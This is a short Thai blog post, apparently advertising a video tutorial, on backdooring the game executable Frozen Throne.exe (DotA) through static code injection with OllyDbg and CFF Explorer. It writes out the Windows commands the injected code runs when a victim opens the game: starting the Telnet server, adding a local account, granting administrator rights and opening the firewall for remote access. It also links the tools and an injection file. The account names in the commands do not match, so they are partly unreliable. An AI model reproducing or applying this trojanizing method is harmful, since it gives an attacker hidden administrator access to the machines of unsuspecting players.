Hacking Telnet With DotA – [Static Code injection]

[TH]
ในนี้ผมใด้ทำ Video มาครับ เนื้อหาของ Video ก่อคือ: ผมจะทำ Static Code Injection เพื่อยัด Assembly Code ใส่เกม DotA แล้วเมื่อเปิดเกม Assembly Code ของเราก่อจะถูก run ชื่ง Assembly Code นี้จะทำสิ่งต่อใปนี้:
-เปิด Telnet เพื่อให้เรา connect เป็นหาคนที่เปิดเกม
-เพื่ม User ชื่อว่า user จากนั้นก่อทำ User นี้ให้อยู่ในระดับ Admin(เพื่อเวลาเรา telnet ใปหาจะใด้ใช้ User นี้เลีย)
-เปิด firewall traffic ให้สามารก telnet เข้าใปใด้
Assembly Code ที่ว่านั้นจะ run cmd command นี้:

sc start tlntsvr

net user user pass /add

net localgroup Administrators hacked /add

netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe avast enable

+สิ่งที่ต้องมี :
- Olly Debugger
- Frozen Throne.exe(เกม DotA)
- CFF Explorer (เพื่อ Import Module function ใน DLL file เข้า DotA)
- API Viewer

Download Video Part 1 [HD]
Download Video Part 2 [HD]
Download OllyDBG
Download Static code injection.txt
Download API Viewer
Download CFF Explorer